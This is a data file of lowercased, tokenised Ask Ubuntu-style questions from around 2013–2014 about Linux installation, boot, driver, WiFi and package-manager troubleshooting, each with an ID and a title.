414638	âoperating system not found â after installing ubuntu 13.04	i successful installed ubuntu 13.04 on my laptop with usb key . but after i reboot i get this error `` operating system not found '' i used boot-repair and it gives me this : http : //paste.ubuntu.com/6858880/ i think i probably messed up with the partitioning . can anyone give me some help ?
414641	change directory during install of deb packages for libreoffice 4.2 producing no file found cmd line	i am sure i am missing something simple here so apologies in advance if i missed the answered somewhere else . i am relatively new to linux , have had ubuntu 12.04.4 lts installed for about 2 years now . now i want to get in under the hood and actualy understand the os . so i decided to update libreoffice to ver.4.2 . i uninstalled the previous copy of libreoffice following the instructions on libreoffice.net . next i downloaded the tar.gz file to download directory , then extracted it within the download directory . next , i went to change directory before installing the deb package . and here is where the problem occurs . i get as a result bash : cd : /home/kevindv/downloads/libreoffice_4.2.0.x_linux_x86-64_deb/debs : no such file or directory i tried typing it in , copy and paste with the middle-click mouse button - both get the same result . thanks in advance for your help in this matter . : - )
414643	partition not mounting on bootup	i have a home server with my movies and what not on it . when i boot the pc it tells me that ( media/media/ is the drive ) /media/media/ is not ready to mount or is not available ( i do n't know the exact words ) so i pressed s to skip mounting and manually mounted it in gparted , which said it was n't even set up , which i had already done when i first set up the server . i am going to post below the /etc/fstab/ and gksu blkid and see if y'all can help me . it seems to be fine , but for some reason when i restart the computer it 's as if i never set up the partition . anyway , here it is : /dev/sda1 : uuid= '' dd0448ac-2f22-4b55-9a5a-ebebef6cadbc '' type= '' ext4 '' /dev/sda3 : label= '' media '' uuid= '' 40f81dff77feaf2f '' type= '' ntfs '' /dev/sda5 : uuid= '' d20a43cb-86f5-4d81-85a6-c4fc21248e11 '' type= '' swap '' that is the gksu blkid . here is the /etc/fstab/ # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdc1 during installation uuid=dd0448ac-2f22-4b55-9a5a-ebebef6cadbc / ext4 errors=remount-ro 0 1 # swap was on /dev/sdc5 during installation uuid=d20a43cb-86f5-4d81-85a6-c4fc21248e11 none swap sw 0 0 /dev/sdb3 /media/media ntfs defaults 0 0 /dev/sda3 /media/media ntfs defaults 0 0 thanks in advance ! edit/correction : media/media is not the drive , it is the partition on the drive with ubuntu as well . sorry my misuse of vocabulary
414649	how to get rid of the language symbol ?	migrated from 12.10 to 13.10 a couple of days ago . i speak english , british english . i have a british layout keyboard . now i have a square symbol in the top bar ( or whatever it 's proper name is ) with en1 in and when i click on that there is an en2 ( american english ) . migration took two attempts . the first was via the upgrade path straight from 12.10 which meant i kept all my settings and files and folders ( or so i thought ) . however i was obliged to bin the whole lot and essentially start again when i discovered that during the upgrade ubuntu did n't recognize my keyboard correctly - i no longer had a `` âł '' , and instead of @ i received `` when typing in my email address ( ! ! ) at this time i noticed the en language symbol in the top bar . i binned the os and thereafter i downloaded 13.10 straight from ubuntu , burned to disc , loaded on . keyboard working now as it should but language symbol still there . is it ( the language symbol ) supposed to be there ? if not , how to i get rid of it ? ( and i do n't want to have to go through the whole carry-on of rubbing stuff off and reloading stuff back on again which takes up more time than i care to mention . if have to live with the thing sitting there doing nothing i will do ... )
414651	boot wubi in another bootloader	i have a macbook pro 9.2 , with 2 partitions ( 3 , considering mac os recovery ) , one with macos x and another with windows 8 . i have installed ubuntu through wubi in windows and i 'd like to , if possible , boot it directly from refind ( derives from refit ) . i tried adding menuentry `` ubuntu '' { icon \efi\refind\icons\os_ubuntu.icns volume `` bootcamp '' loader \ubuntu\winboot\wubildr.mbr } but it gives me the error invalid loader file error : not found while loading wubildr.mbr when i try to boot . i got the boot info from easybcd on windows , which has the following entry : name : ubuntu bcd id : { 9c8f59fa-914f-11e2-98b8-e34e83468ecd } drive : c : \ bootloader path : \ubuntu\winboot\wubildr.mbr thanks in advance for any help .
414653	why i ca n't install any of the stable versions of ubuntu in my system ?	i just bought a toshiba satellite c55dt-a ( touch screen ) . why the only distro i can install it is the . ubuntu trusty thar daily build . i try the following . ubuntu 12.04 , 13.10 , zorin 6 , 7 , and 8 . xubuntu etc . i 'm sorry guys . but is my first time here in ask ubuntu , i'l try to learn more about the rules to make understandable questions .
414654	how to get optimal performance from centrino advanced-n 6205 wifi card	i 've just had my home internet upgraded to 50mb/s down , but i can only get about 25 mb/s down on my laptop over wifi . my phone gets about 45 mb/s down over the same wifi and i get the full 50 mb/s down when connected via ethernet cable to the router , so i 'm fairly sure the problem is on my laptop . lspci says : 03:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6205 [ taylor peak ] [ 8086:0085 ] ( rev 34 ) this makes me think that for some reason iwlwifi is n't driving the card as hard as it can go : mwhudson @ narsil : ~ $ iwlist wlan0 rate wlan0 unknown bit-rate information . current bit rate:54 mb/s ( the card can do 300mb/s according to intel 's pages , as can my router ) . i see similar performance on the 2.4ghz and 5ghz bands ( my phone only does 2.4ghz ) . i 'm running up to date ubuntu saucy .
414657	kubuntu 13.10 emacs binding in google chrome	i like to use emacs keybinding such as ctrl-a beginning of line in all my browsers . i have it working fine in firefox , but not in google chrome . i followed the instructions in how do i enable emacs keybindings in google chrome ? as well as having ~/.gtkrc-2.0 include the line gtk-key-theme-name = `` emacs '' none of these seem to affect chrome .
414661	missing administrator options lubuntu ?	i 'm running lubuntu and posts say that you can add drivers by using system > administration > hardware/additional drivers . there is no such menu choice . i have system tools or preferences . neither has the administration option . where can i find the additional drivers options in lubuntu ?
414662	all directories are 0755 , did i do something wrong ?	i 'm new to *nix and ubuntu 12.04 lts and i 've just noticed that all my directories have permissions set to 0755 . that seems unsafe to me . why do i need to grant execute perms for the world on my /usr dir ? is this the default , or did i accidentally set this when i was granting permissions on my /srv directory . i ran the following commands that i think may be the culprit ( s ) : sudo chmod /srv/www -r 0755 sudo chmod g+s /srv/www what are the default permissions for any given ubuntu directory ? what permissions should i set for my /srv/www webfoot directory ? edit : my /srv/www convention is like so : /srv/www/somedomain.com/public_html /srv/www/otherdomain.com/public_html thanks .
414663	how to install world of goo.deb	i purchased the full version of world of goo and downloaded the .deb file . when i try to launch the game from the applications menu , nothing happens . when it installed in terminal , it installed something , but did n't seem to install everything . here 's the install code from the terminal : sudo dpkg -- install worldofgoosetup.1.41.deb selecting previously unselected package worldofgoo . ( reading database ... 173872 files and directories currently installed . ) unpacking worldofgoo ( from worldofgoosetup.1.41.deb ) ... setting up worldofgoo ( 1.41 ) ... processing triggers for desktop-file-utils ... processing triggers for hicolor-icon-theme ... what am i doing wrong ?
414664	stream superbowl from canada	no , this question is n't `` too localised '' , it 's local to an entire country . i 'm on http : //www.ctv.ca/nfl-playoffs-superbowl and of course the ads come through fine , but the flash player hangs after that . does anything else work from canada ? i 've tried fox , but they just seem to give scores , not the live coverage . no luck on fox :
414666	bumblebee with 2 dedicated video cards ?	so i have a lenovo 510p laptop , with integrated intel hd 4600 graphics , plus 2 geforce gt 755m-s , one of which is in the ultrabay and thus is removable . i 'm running lubuntu 13.10 . i use the proprietary nvidia driver ( 331 ) . i installed bumblebee , and it seems to be working fine when the removable graphics card is n't present , however if i plug in the ultrabay , strange things happen . somehow it seems that the integrated intel card is n't picked up , and i have no idea , what happens actually . some logs : optibay vga taken out : lspci | grep -e `` vga|3d '' 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 755m ] ( rev ff ) sudo lshw -c video *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:47 memory : c2000000-c23fffff memory : b0000000-bfffffff ioport:5000 ( size=64 ) glxinfo | grep opengl opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) haswell mobile opengl core profile version string : 3.1 ( core profile ) mesa 9.2.1 opengl core profile shading language version string : 1.40 opengl core profile context flags : ( none ) opengl core profile extensions : opengl version string : 3.0 mesa 9.2.1 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : optirun glxinfo | grep opengl opengl vendor string : nvidia corporation opengl renderer string : geforce gt 755m/pcie/sse2 opengl core profile version string : 4.3.0 nvidia 331.20 opengl core profile shading language version string : 4.30 nvidia via cg compiler opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 4.4.0 nvidia 331.20 opengl shading language version string : 4.40 nvidia via cg compiler opengl context flags : ( none ) opengl profile mask : ( none ) opengl extensions : optibay vga connected : lspci | grep -e `` vga|3d '' 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 755m ] ( rev a1 ) 07:00.0 3d controller : nvidia corporation gk107m [ geforce gt 755m ] ( rev a1 ) sudo lshw -c video *-display description : vga compatible controller product : gk107m [ geforce gt 755m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:50 memory : d3000000-d3ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:5000 ( size=128 ) memory : b2000000-b207ffff *-display description : 3d controller product : gk107m [ geforce gt 755m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:07:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=nvidia latency=0 resources : irq:51 memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:4000 ( size=128 ) glxinfo | grep opengl opengl vendor string : nvidia corporation opengl renderer string : geforce gt 755m/pcie/sse2 opengl core profile version string : 4.3.0 nvidia 331.20 opengl core profile shading language version string : 4.30 nvidia via cg compiler opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 4.4.0 nvidia 331.20 opengl shading language version string : 4.40 nvidia via cg compiler opengl context flags : ( none ) opengl profile mask : ( none ) opengl extensions : optirun glxinfo | grep opengl [ 379.117608 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 379.117665 ] [ error ] aborting because fallback start is disabled . so the big question is : is this normal ? i never had a machine like before ( also never used bumblebee before ) , so i do n't really know , what to expect . nevertheless , the situation seems strange , and if possible , i 'd like to use the intel card both cases and it would nice not having to remove the second vga when i want a nicely working linux . is there a way for example to completely disable/hide the optibay vga ? i would n't want to use it in linux anyway .
414669	is there an upstart event for a process listening on the network ?	i 'd like to take an action whenever a process begins listening on a port , i tried using upstart-monitor and `` nc -l '' , but i did n't see any events being generated .
414676	is there a way to get bouncy cursor using unity ?	i have just realized that compiz does n't have the option for a bouncing cursor ( a cursor that will bounce whenever you access an application , like a busy cursor ) as kde does it . is there a way to enable ( or get ) such a feature ?
414687	having problem selecting partition for kubuntu	i have three partitions on my hdd of 24gig . how could i install kubuntu on a specific partition without destroying the partition with win.7 ?
414693	install ubuntu12.04.3 lts with ext4fs	i have a problem to install ubuntu12.04.3 lts in my computer . my computer is dell ( cpu : p4 , 3ghz ram : 1gb hdd : 20gb ) . i downloaded ubuntu12.04.3 lts and installed this by using wubi . then it was installed on rootfs.img file in fat32 file system . but i want to install ubuntu on ext4 file system .
414698	console output during boot - > ubuntu 13.10	i tried different options ( nosplash noplymouth , removing 'quiet ' and 'splash ' ) in /etc/default/grub to disable purple background and display kernel messages in native resolution 1366x768 but nothing worked 100 % . the only solution that worked was to enable console : grub_terminal=console problem with this is that i loose resolution and text becomes hard to read . is there an option i can use to define resolution of the output console ? btw - esc does not work on my laptop and i did run sudo update-grub
414700	nautilus crashes when viewing directory with .jp2	nautilus crashes whenever one tries viewing a directory containing jpeg 2000 files , i suspect because it tries to create a thumbnail and fails ( i 'm using 13.10 , and you can probably reproduce this quite easily as well ) . is there a way to tell nautilus not to thumbnail certain formats ? is there a known fix for this problem ? there are similar bugs for very old versions of nautilus , but not any in recent years .
414702	how to delete an apparent old partition in ubuntu 12.04 caused by having installed ubuntu once more again ?	comrades , i have this problem who is making me crazy . it turns out , it was caused by a stupid act of mine . i just wanted to uninstall libre office , so i wrote the command `` sudo apt-get remove libre office '' . i do not still know the reason why it started to unistall all of the ubuntu programs but libreoffice . i reacted and stopped the procces in the terminal- bur it was too late- . the terminal application was gone , as well as ubuntu sofware center , i tried to update the system , but i clicked on the option and nothing happened . i managed to turn it off , causing me the problem of not being able to access to the login page . it got stuck in a black letter window and nothing else happened . eventually , it came to me the idea of reinstalling it . i did it . but now- and this is the problem now- , i have 3 extensions of `` ext 4 '' which are part of the extended partition . the one with the / , is the one where my actual files are being stored and it says dev/sd8 , the other ones are from my older partitions , dev/sda5 ; dev/sda7 , respectively . i try to eliminate them , and use them as storage space , but its not possible . is there any way to use them as useful space ? please help me . thank you
414703	how do i write an lsb header ?	i used these instructions to try to make a script run at startup . i got the error `` missing lsb information . see http : //wiki.debian.org/lsbinitscripts '' so i did . i sort of get what 's going on , but have no idea what now to do with that information . the page is very technical and assumes i 've got some starting knowledge of what 's going on , and i have n't . could someone maybe link me to a page that is more `` for dummies ? '' i 've done some googling and have n't turned up anything , but as i said i do n't really have any of the basic knowledge that this page assumes , so it might be that i do n't even know what to google to find what i 'm looking for . alternatively , if there 's a better way to run a wine app before the gui loads ( or an easier way to shoe-horn a script into rc ) , that would be just as helpful .
414704	ca n't manage to get the ath9k driver working on laptop ( wifi adapter atheros ar9285 , ubuntu 12.04 )	im trying to get aircrack working i get this when using the airmon-ng start wlan0 command . root @ ubuntu : /home/bryan # airmon-ng start wlan0 found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! -e pid name 797 avahi-daemon 798 avahi-daemon 998 networkmanager 1033 wpa_supplicant 1291 dhclient process with pid 1291 ( dhclient ) is running on interface wlan0 interface chipset driver wlan0 atheros ath9k - [ phy0 ] error : neither the sysfs interface links nor the iw command is available . please download and install iw from http : //wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2 when trying to install this iw-0.9.19.tar.bz2 apparenly it says is already installed . so far i have tried installing this compat-wireless-3.5.1-1.tar.bz2 using this steps tar jvxf compat-wireless-3.5.1-1.tar.bz2 cd compat-wireless-3.5.1-1 scripts/driver-select ath9k make make install reboot but i keep getting the same message as above . im using asus laptop with ar9285 wireless adapter on ubuntu 12.04 please any help would be really appreciated thanks .
414705	how to setup squid proxy server on ubuntu 12.04 lts ?	i had tried using the ubuntu wiki guidelines to set it up on test server , and it worked . though i would appreciate if anyone can provide me with few other links as this time i am going to install it on a live server which has few other services configured and those services need internet . so frankly do n't wan na mess with it , however i have to configure the proxy server on it as it 's client requirement . i need a few links which can give me info of details of each step involved in installation and configuration of squid proxy server and what activity each step will perform ? if you would like to suggest new proxy server part than squid then the requirements are below : must have a web console to configure and perform daily changes , alterations etc . opennms should be able to monitor it . should be able to granularly configurable , for future requirements . please feel free to correct the question or ask for more info where required , as i 'm not that great with the language : p thank you all in advance .
414706	ubuntu 12.04 bad superblock	can not mount an iso and the one time it did , it showed up empty . iso is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/loop1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dmesg | tail [ 46824.033565 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 46824.033568 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 46824.033570 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 46825.227460 ] wlan0 : authenticate with 7a : b6:86:6b:13:19 [ 46825.242375 ] wlan0 : send auth to 7a : b6:86:6b:13:19 ( try 1/3 ) [ 46825.246638 ] wlan0 : authenticated [ 46825.258025 ] wlan0 : associate with 7a : b6:86:6b:13:19 ( try 1/3 ) [ 46825.260895 ] wlan0 : rx assocresp from 7a : b6:86:6b:13:19 ( capab=0x1 status=0 aid=1 ) [ 46825.260979 ] wlan0 : associated [ 46986.166953 ] isofs : unable to identify cd-rom format . using 12.04.2 64-bit if you need any other system information , just ask .
414708	user agent switchers not working	a particular website ( livemocha.com -- > `` create account '' ) brings me to a page that says `` linux support coming soon . '' so i tried to use user agent switcher extension for firefox , and ultimate user agent switcher for chromium . neither worked , the website still rejected me with `` linux support coming soon . '' are there any other ways to trick a website into thinking i am running windows or mac ? and why are the user agent switchers failing ? how does the website see through them ?
414712	oxford 8 on ubuntu 13.10	i have the oxford ed.8 setup folder on my hard disk in folder ( downloads ) and here what i 've got in the terminal when i try to install it ( the install folder has setup for linux with name : linux ) : warning : root : python-html2text is not present . html pages will not be converted into text . shams @ shams-ms-7592 : ~ $ cd downloads/oxford/linux/ shams @ shams-ms-7592 : ~/downloads/oxford/linux $ ./setup.sh the setup program seems to have failed on amd64/unknown fatal error , no tech support email configured in this setup
414713	how to fix lubuntu gui	as the title states , my lubuntu 13.10 install is n't working quite right currently . i installed everything just fine and was just getting comfortable with my setup . a few of the games i play were having graphics issues , so i was trying to fix that and in turn , broke everything . when i boot , after i choose lubuntu , all i get is a flashing horizontal cursor in the top left of my screen . i can switch to terminal mode via ctrl + alt + f1 and work from there , but that 's it . this began after i installed a package from the command line ( i want to say it was nvidia-331 perhaps ? ) . after rebooting , i uninstalled that package and rebooted again to be greeted with the same sad situation . i tried installing nvidia-current which has n't changed anything . i also tried installing gnome-shell to see if it was a problem with the lubuntu desktop , but it did not change anything . any suggestions would be gladly welcome . specs : lenovo w510 nvidia 880m i7 q720 4gb ram edit : as @ nikth suggested , [ this page ] helped fix my initial issue . i simply ran the following : sudo apt-get remove -- purge nvidia-* sudo apt-get install lubuntu-desktop sudo rm /etc/x11/xorg.conf this got my display working properly , but now i load into a login screen , though , which i never had before . when i log in , the screen flashes and brings me right back to the same login screen . again , following @ nikth 's suggestion , i ran : rm ~/.xauthority sudo service lightdm stop ; sudo service lightdm start and all is well again !
414722	ubuntu 13.10 - `xserver-common-lts-raring` needs an update ?	i am new to ubuntu and i 'm having a problem with the package xserver-common-lts-raring . it says that i need to delete this packet and to update , but i do n't know what should i do . can you help ? i have looked online and i am about to forget it and just try something else , but i am still trying to figure out what i did wrong ? ok says this any time i try downloading and install anything i did what u said got this hope this helps . i think this is what u said to do ... srry if i did it wrong . below is what the terminal said . i hit n and it aborted so i hit y so u could see what else there was if any info that could help . reading package lists ... done reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be removed : xserver-common-lts-raring the following packages will be upgraded : curl flashplugin-installer gir1.2-soup-2.4 libcurl3 libcurl3-gnutls libsoup-gnome2.4-1 libsoup2.4-1 libyaml-0-2 linux-firmware 9 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/26.6 mb of archives . after this operation , 1,638 kb disk space will be freed . do you want to continue [ y/n ] ? y preconfiguring packages ... ( reading database ... 206792 files and directories currently installed . ) removing xserver-common-lts-raring ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-raring' dpkg-divert : error : rename involves overwriting /usr/lib/xorg/protocol.txt ' with different file/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing xserver-common-lts-raring ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : xserver-common-lts-raring e : sub-process /usr/bin/dpkg returned an error code ( 1 ) serteka @ serteka-hp-2000-notebook-pc : ~ $
414725	nproc returning two values on python	i 'm trying to write a script to do something that i repetitively do everyday , and that for it to be useful i need the value given by the command nproc . the problem is that nproc on bash returns my number of cores just fine , but when i call python and inside in import os and then do os.system ( `` nproc '' ) , it first gives me the correct value , and later a zero value . why this happen and how can i fix it ? edit : also tried the method `` lscpu | grep cpu | awk 'nr==2 { print $ 2 } ' '' and same thing happened ...
414726	`` sudo apt-get update '' command wo n't work	i am trying to install azenis icons and it wo n't work . whenever i type `` sudo apt-get update '' this is what i get : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
414734	how to enter bios menu again after uninstalling refind ?	i have two hard-drives and installed separately windows 7 and ubuntu 12.04 on them . uefi and `` fast boot '' are enabled in bios . i was unable to make dual boot through grub menu but was able to do that changing boot sequence from bios setup . i have tried to fix the dual boot issue using refind boot manager . as refind did not allow me to dual boot i have decided to remove refind . # rm -r /boot/efi/efi/refind or $ sudo rm -r /efi/refind according to rodsbooks.com instructions . then i have changed boot sequence in bios menu and removed refind from boot options . after a reboot my machine starts as usual with a specific click and after that it is just a black screen . all indicator lights are on and i can hear fan and hard-drive working . i can no longer boot into asus g75vx bios menu . regression i can even use dvd disc drive . however inserting a live cd for both operating systems does nothing . pressing f2-f12 or esc keys are not working as well . is there any software way to fix the problem or i have to replace bios chip ?
414737	how do i install itunes on ubuntu ?	i 've tried different ways to install itunes , but to no avail . i tried with wine , but it did n't work . can i have itunes on ubuntu .
414740	cant install xampp ( syntax error : unterminated quoted string )	sorry for my english i did those steps 1 ) dowmload de file : xampp-linux-x64-1.8.3-2-installer.run 2 ) open terminal ... jonasjhy @ ububtu : ~/downloads $ 3 ) write this jonasjhy @ ububtu : ~/downloads $ chmod 755 xampp-linux-x64-1.8.3-2-installer.run 4 ) and write this jonasjhy @ ububtu : ~/downloads $ sudo ./xampp-linux-x64-1.8.3-2-installer.run ... and then the computer show me this ./xampp-linux-x64-1.8.3-2-installer.run : 2 : ./xampp-linux-x64-1.8.3-2-installer.run : syntax error : unterminated quoted string whats the problem , can you help me
414741	how to hide wine app titlebar when window is maximized	this is a quick post to show how to make wine app hides the titlebar and fully fill the vertical area of screen space when maximized . in unity de , when wine app is maximized , it does n't hide the titlebar so the window ca n't be fully maximized . it looks something like this :
414746	comparing certificates in firefox	i need to compare the google-mail certificates of firefox browser while connecting to the google-mail server ( its a demand cause i 'm building a customized system for my clients ) i know firefox does it in default but i want to precheck it before and cut the session if the certificate is not genuine . how can i do it via command line with a script ( bash is preferred ... ) thanks ' ahead jimmi
414747	does ubuntu use tpm 2.0 chip ?	my intel motherboard has a tpm 2.0 chip . ubuntu 13.04 seems to have a driver for it , but what does it do with it , anything ? can it be switched off/disabled ?
414750	any good tutorial install for twitter scrooge ?	i need install twitter scrooge thrift code generator for java in ubuntu.i searched many places there is no good documentation for installing scrooge .please suggest me for good sites
414753	will installing ubuntu on drive c delete my existing data on partitions d and e ?	i am planning to install ubuntu on my hp laptop as i ca n't install windows 8 due to this error message during installation : windows can not be installed on this disk . the selected disk is of the gpt partition style . so i have decided to go for ubuntu . presently i have three partitions on my hard disk ( drives c , d and e ) , where drive c was the windows partition . i have important files ( photographs , office files , etc . ) in drives d and e. i would like to know whether drives d and e would remain intact/unaffected after installing ubuntu on drive c .
414757	cant install from usb or dvd -- posted solutions not resolving the issue	hi and thanks for taking the time to view my question , i 've been trying to install x/ubuntu ( 12/13.04/10 ) , all to no avail . from usb i always encounter the output : busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu7 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file system a sample of what i 've tried : switching to a usb2.0 slot toggling on ahcpi in the bios booting in either legacy or uefi modes 3 different usb drives aforementioned isos ( x ) ubuntu 12.x and 13.x i dug out an old optical drive and made a ubuntu 13.10 dvd , got a screen up which is the furthest i 've gotten , funny thing was it was all black except for the installer window and as soon as i hit install it freaks and alerts : error : unable to read from /dev/sda i 'm thinking something is going on with my ssd . i 'm running windows 8.1 on it currently , it 's a corsair nova 30gb ssd .
414759	how to switch workspace via the unity desktop icon via mouse wheel specifically	i want to wheel over the `` workspace icon '' in the unity switcher to change desktops . ( i know you can switch workspaces via compiz which is ok for wheeling the desktop ) , but i would like to wheel over the unity switcher icon to switch workspaces . lubuntu , kubuntu , and xubuntu all allow you to wheelover the workspace icon to change desktops , can unity 's icon be configured to do the same ? can this be done with ubuntu 14.04 or 14.10 and the new unity ? the mouse wheel is critical for workspaces for me . anyone know ?
414761	ubuntu 14.04 do not start x at login	i want to log in to a console without starting the x server or any other graphical interface . i removed unity , unity-2d , and lightdm . i removed lightdm from /etc/init at boot time , i get the ubuntu ... splash . ctrl-alt-f1 gets me to a console prompt . how do i prevent the ubuntu splash ? when i login , the x server is started . i do not want this to happen . i have some applications that i want to run from the console and do not want the x server running . tom dean
414762	can i install ubuntu on an external hard drive and make it bootable from any other computer ?	as the title mentioned , please give some suggestions ?
414765	ubuntu sdk fails to launch	i get the following error in terminal while launching the ubuntu-sdk loaded the dummy plugin loaded the linux plugin segmentation fault ( core dumped )
414766	install 32bit or 64bit packages for 64bit ubuntu ?	just a simple question . i want to install a deb package and which should i select - 32bit or 64bit package ? my ubuntu is 64bit version , but recently i read for some programs they advice to install 32bit packages , so now i am confused .
414767	.profile edit in terminal log loop	while following a guide to install unity so i can program for ouya it asked me to add a line into my .profile . after i did that and restarted i am no stuck at the login screen . i 'm not sure how to fix this or how to remove the line of code i added in . can any tell me how i can remove this line from the terminal ? at the log in screen i can hit ctrl alt f3 and log in to my account but when i switch back to the gui it just keeps looping please help i do n't want to have to format my hard drive .
414768	how to back up a folder in the c root file in xp.. only place the folder can be	i have a folder directly under c : / that can only be located there in order to work . i have to back it up daily , i was hoping ubunto would do that , but it keeps saying the file must be elsewhere ( my documents ) . does this mean , i 'll be looking for another sync program to keep this folder backed up ? hope not ! any answer to how to back up a c : /folder ?
414771	plug in installation problem in sublime text 2	i am need to install package control into the sublime text , i found some procedure in the following link : https : //sublime.wbond.net/installation but both the `` simple '' and `` manual '' procedure does n't work . how can i fix this ?
414774	'e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) '	i 've gone through all of the other reports of this but when ever i follow the instructions and it opens my sources.list there are no numbers lines and there is barely anything in it . i saved my sources.list to pastebin , here is the link http : //pastebin.com/tqqpbtvd screenshots of my software sources : please help my figure out what the problem is .
414777	ubuntu 12.04 , mouse pointer ( laptop touchpad ) get stuck sometime ?	in my ubuntu 12.04 system , i faced this problem many times that my mouse pointer get stuck to its position , do n't move anywhere , every other thing works fine except the pointer and finally i have to restart my system , no choice . how can i resolve it so that next time i do n't need to restart my system . ?
414781	is intel celeron 1019y supports ubuntu 12.04.3 ( 3d accelerating ) ?	does ubuntu 12.04.3 lts supports intel celeron 1019y ? on intel 's sitee defines intel hd graphics , on partners 's sites specifieds intel gma hd . i have a bad user experience with intel gma hd and ubuntu , so i bother about that . is this gpu full supported ? and last , but not least , could i run steam games on this gpu ? once i have an intel gma hd-powered device , and this device does n't run steam at all ; (
414783	unable to run vmware - failed to build vmnet	i am unable to run vmware and below is the error log as to why . any idea , though and suggestions are appreciated . thank you . 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : log for vmware workstation pid=5707 version=10.0.1 build=build-1379776 option=release 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : the process is 64-bit . 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : host codepage=utf-8 encoding=utf-8 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : host is linux 3.13.0-031300-generic ubuntu 13.10 2014-02-03t16:32:00.903+08:00| vthread-3| i120 : msg_reset : 2014-02-03t16:32:00.903+08:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /usr/lib/vmware/settings '' : no such file or directory . 2014-02-03t16:32:00.903+08:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2014-02-03t16:32:00.903+08:00| vthread-3| i120 : pref optional preferences file not found at /usr/lib/vmware/settings . using default values . 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : msg_reset : 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/config '' : no such file or directory . 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : pref optional preferences file not found at /root/.vmware/config . using default values . 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : pref unable to check permissions for preferences file . 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : msg_reset : 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/preferences '' : no such file or directory . 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2014-02-03t16:32:00.904+08:00| vthread-3| i120 : pref failed to load user preferences . 2014-02-03t16:32:00.904+08:00| vthread-3| w110 : logging to /tmp/vmware-root/vmware-modconfig-5707.log 2014-02-03t16:32:00.935+08:00| vthread-3| i120 : obtaining info using the running kernel . 2014-02-03t16:32:00.935+08:00| vthread-3| i120 : created new pathshash . 2014-02-03t16:32:00.935+08:00| vthread-3| i120 : setting header path for 3.13.0-031300-generic to `` /lib/modules/3.13.0-031300-generic/build/include '' . 2014-02-03t16:32:00.935+08:00| vthread-3| i120 : validating path `` /lib/modules/3.13.0-031300-generic/build/include '' for kernel release `` 3.13.0-031300-generic '' . 2014-02-03t16:32:00.935+08:00| vthread-3| i120 : using /usr/bin/gcc for preprocess check 2014-02-03t16:32:00.950+08:00| vthread-3| i120 : preprocessed uts_release , got value `` 3.13.0-031300-generic '' . 